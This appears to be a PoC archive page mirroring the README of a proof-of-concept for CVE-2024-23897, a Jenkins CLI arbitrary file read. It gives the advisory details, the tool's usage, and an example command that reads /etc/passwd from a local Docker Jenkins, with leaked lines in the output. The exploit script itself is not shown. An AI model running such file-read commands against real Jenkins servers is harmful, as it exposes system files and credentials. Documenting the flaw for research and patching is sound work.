Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%
Buy Us a Coffee

CVE-2024-23897 PoC — Jenkins 安全漏洞

Source
https://github.com/Vozec/CVE-2024-23897
Associated Vulnerability
Title:Jenkins 安全漏洞 (CVE-2024-23897)
Description:Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable a feature of its CLI command parser that replaces an '@' character followed by a file path in an argument with the file's contents, allowing unauthenticated attackers to read arbitrary files on the Jenkins controller file system.
Description
This repository presents a proof-of-concept of CVE-2024-23897
Readme
# CVE-2024-23897
This repository presents a proof-of-concept of CVE-2024-23897 (*Discovered by sonarsource*)

# CVE-2024-23897 | File read in jenkins 

## Disclamer
This code is a proof of concept of the vulnerability, I'm not pushing anyone to use it on confluence instances they don't own.  
This tool has been developed for research and educational purposes only and I will not be held responsible for any use you may make of it.

## Description
According to [Jenkins Security Advisory 2024-01-24 ](https://www.jenkins.io/security/advisory/2024-01-24/):
Jenkins uses the args4j library to parse command arguments and options on the Jenkins controller when processing CLI commands. This command parser has a feature that replaces an @ character followed by a file path in an argument with the file’s contents (expandAtFiles). This feature is enabled by default and Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable it. This allows attackers to read arbitrary files on the Jenkins controller file system using the default character encoding of the Jenkins controller process.

- Attackers with Overall/Read permission can read entire files.
- Attackers without Overall/Read permission can read the first few lines of files.

## Help
```md
$ python3 CVE-2024-23897.py -h
usage: CVE-2024-23897.py [-h] -u URL -f FILENAME

This is a POC for CVE-2024-23897 (Jenkins file read)

options:
  -h, --help   show this help message and exit
  -u URL       Url
  -f FILENAME  Filename
```

## Example
```
docker pull jenkins/jenkins:2.440-jdk17
docker run  -p 8080:8080 jenkins/jenkins:2.440-jdk17
```

```bash
$ python3 CVE-2024-23897.py -u http://127.0.0.1:8080 -f '/etc/passwd'
[+] Trying to recover /etc/passwd
[+] Data recovered:

ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
 [COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
```


## References: 
- https://www.jenkins.io/security/advisory/2024-01-24/
- https://www.sonarsource.com/blog/excessive-expansion-uncovering-critical-security-vulnerabilities-in-jenkins/
- https://twitter.com/zin_min_phyo/status/1750827780856816063
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →